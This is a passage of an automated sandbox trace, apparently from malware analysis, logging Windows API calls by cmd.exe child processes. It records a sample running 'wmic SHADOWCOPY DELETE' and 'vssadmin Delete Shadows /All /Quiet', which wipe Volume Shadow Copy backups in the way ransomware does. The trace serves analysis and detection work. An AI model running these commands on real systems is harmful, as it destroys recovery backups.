CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.754] GetUserDefaultLCID () returned 0x409 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x34f800, cchData=128 | out: lpLCData="0") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x34f800, cchData=128 | out: lpLCData="0") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x34f800, cchData=128 | out: lpLCData="1") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0076.755] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0076.756] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0076.756] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0076.757] GetProcessHeap () returned 0x5d0000 [0076.757] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20c) returned 0x5e2dc0 [0076.757] GetConsoleTitleW (in: lpConsoleTitle=0x5e2dc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.758] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.758] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0076.758] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0076.758] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0076.758] GetProcessHeap () returned 0x5d0000 [0076.758] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400a) returned 0x5e6a38 [0076.758] GetProcessHeap () returned 0x5d0000 [0076.759] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6a38 | out: hHeap=0x5d0000) returned 1 [0076.759] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0076.759] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0076.759] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0076.759] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0076.759] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0076.759] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0076.759] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0076.759] GetProcessHeap () returned 0x5d0000 [0076.759] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e2fd8 [0076.759] GetProcessHeap () returned 0x5d0000 [0076.759] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x5e3038 [0076.760] GetProcessHeap () returned 0x5d0000 [0076.760] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5e3058 [0076.761] GetConsoleTitleW (in: lpConsoleTitle=0x34f4f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.761] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0076.761] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0076.761] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0076.761] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0076.761] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0076.761] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0076.761] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0076.761] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0076.761] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0076.761] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0076.761] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0076.761] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0076.762] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0076.762] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0076.762] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0076.762] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0076.762] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0076.762] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0076.762] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0076.762] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0076.762] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0076.762] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0076.762] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0076.762] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0076.762] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0076.762] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0076.762] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0076.762] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0076.762] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0076.762] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0076.762] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0076.762] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0076.762] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0076.762] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0076.762] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0076.763] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0076.763] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0076.763] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0076.763] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0076.763] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0076.763] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0076.763] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0076.763] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0076.763] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0076.763] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0076.763] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0076.763] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0076.763] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0076.763] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0076.763] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0076.763] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0076.763] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0076.763] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0076.763] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0076.763] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0076.763] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0076.763] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0076.763] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0076.763] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0076.763] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0076.764] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0076.764] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0076.764] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0076.764] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0076.764] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0076.764] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0076.764] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0076.764] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0076.764] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0076.764] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0076.764] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0076.764] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0076.764] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0076.764] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0076.764] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0076.764] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0076.764] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0076.764] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0076.764] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0076.764] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0076.764] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0076.764] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0076.764] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e3090 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x38) returned 0x5e32a8 [0076.765] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x418) returned 0x5d07f0 [0076.765] SetErrorMode (uMode=0x0) returned 0x0 [0076.765] SetErrorMode (uMode=0x1) returned 0x0 [0076.765] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5d07f8, lpFilePart=0x34f018 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f018*="Desktop") returned 0x25 [0076.765] SetErrorMode (uMode=0x0) returned 0x1 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5d07f0, Size=0x5e) returned 0x5d07f0 [0076.765] GetProcessHeap () returned 0x5d0000 [0076.765] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5d07f0) returned 0x5e [0076.766] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.766] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0076.766] GetProcessHeap () returned 0x5d0000 [0076.766] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x120) returned 0x5e32e8 [0076.766] GetProcessHeap () returned 0x5d0000 [0076.766] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x238) returned 0x5d0858 [0077.105] GetProcessHeap () returned 0x5d0000 [0077.105] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5d0858, Size=0x122) returned 0x5d0858 [0077.105] GetProcessHeap () returned 0x5d0000 [0077.105] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5d0858) returned 0x122 [0077.105] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.105] GetProcessHeap () returned 0x5d0000 [0077.105] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe0) returned 0x5e3410 [0077.106] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e3410, Size=0x76) returned 0x5e3410 [0077.106] GetProcessHeap () returned 0x5d0000 [0077.106] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e3410) returned 0x76 [0077.106] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.106] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.107] GetLastError () returned 0x2 [0077.107] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.107] GetLastError () returned 0x2 [0077.107] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.107] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.371] GetLastError () returned 0x2 [0077.371] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.372] GetLastError () returned 0x2 [0077.372] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.372] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.372] GetLastError () returned 0x2 [0077.372] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.372] GetLastError () returned 0x2 [0077.372] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.372] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0x5e3490 [0077.373] GetProcessHeap () returned 0x5d0000 [0077.373] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e34d0 [0077.373] FindClose (in: hFindFile=0x5e3490 | out: hFindFile=0x5e3490) returned 1 [0077.374] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0xffffffff [0077.376] GetLastError () returned 0x2 [0077.376] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x34ed94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ed94) returned 0x5e3490 [0077.378] GetProcessHeap () returned 0x5d0000 [0077.378] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e34d0, Size=0x4) returned 0x5e34d0 [0077.378] FindClose (in: hFindFile=0x5e3490 | out: hFindFile=0x5e3490) returned 1 [0077.378] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0077.379] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0077.379] GetConsoleTitleW (in: lpConsoleTitle=0x34f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.379] InitializeProcThreadAttributeList (in: lpAttributeList=0x34f114, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34f1dc | out: lpAttributeList=0x34f114, lpSize=0x34f1dc) returned 1 [0077.379] UpdateProcThreadAttribute (in: lpAttributeList=0x34f114, dwFlags=0x0, Attribute=0x60001, lpValue=0x34f1d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34f114, lpPreviousValue=0x0) returned 1 [0077.379] GetStartupInfoW (in: lpStartupInfo=0x34f0d0 | out: lpStartupInfo=0x34f0d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0077.379] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5e3490 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0077.379] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.380] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0077.380] GetProcessHeap () returned 0x5d0000 [0077.380] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e3490 | out: hHeap=0x5d0000) returned 1 [0077.380] GetProcessHeap () returned 0x5d0000 [0077.380] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xa) returned 0x5dff08 [0077.380] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0077.382] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x34f170*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic SHADOWCOPY DELETE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34f1bc | out: lpCommandLine="wmic SHADOWCOPY DELETE", lpProcessInformation=0x34f1bc*(hProcess=0x78, hThread=0x74, dwProcessId=0x208, dwThreadId=0x20c)) returned 1 [0078.386] CloseHandle (hObject=0x74) returned 1 [0078.386] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0078.386] GetProcessHeap () returned 0x5d0000 [0078.386] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5ef8 | out: hHeap=0x5d0000) returned 1 [0078.386] GetEnvironmentStringsW () returned 0x5e5ef8* [0078.386] GetProcessHeap () returned 0x5d0000 [0078.386] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb36) returned 0x5e40b8 [0078.386] FreeEnvironmentStringsW (penv=0x5e5ef8) returned 1 [0078.386] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x45bfa000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 39 os_tid = 0xb90 [0076.700] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34ff7c | out: lpSystemTimeAsFileTime=0x34ff7c*(dwLowDateTime=0xf27eefc0, dwHighDateTime=0x1d61645)) [0076.700] GetCurrentProcessId () returned 0xb40 [0076.700] GetCurrentThreadId () returned 0xb90 [0076.700] GetTickCount () returned 0x11496b4 [0076.700] QueryPerformanceCounter (in: lpPerformanceCount=0x34ff74 | out: lpPerformanceCount=0x34ff74*=19705447843) returned 1 [0076.701] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.701] __set_app_type (_Type=0x1) [0076.701] __p__fmode () returned 0x770331f4 [0076.701] __p__commode () returned 0x770331fc [0076.702] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.702] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.702] GetCurrentThreadId () returned 0xb90 [0076.702] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb90) returned 0x60 [0076.703] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.703] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.703] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.703] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.703] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x34ff0c | out: phkResult=0x34ff0c*=0x0) returned 0x2 [0076.703] VirtualQuery (in: lpAddress=0x34ff43, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x34f000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.704] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0076.704] VirtualQuery (in: lpAddress=0x251000, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x251000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0076.704] VirtualQuery (in: lpAddress=0x253000, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x253000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.704] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x34fedc, dwLength=0x1c | out: lpBuffer=0x34fedc*(BaseAddress=0x350000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x160000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0076.704] GetConsoleOutputCP () returned 0x1b5 [0076.704] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.704] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0076.704] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.704] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0076.704] _get_osfhandle (_FileHandle=1) returned 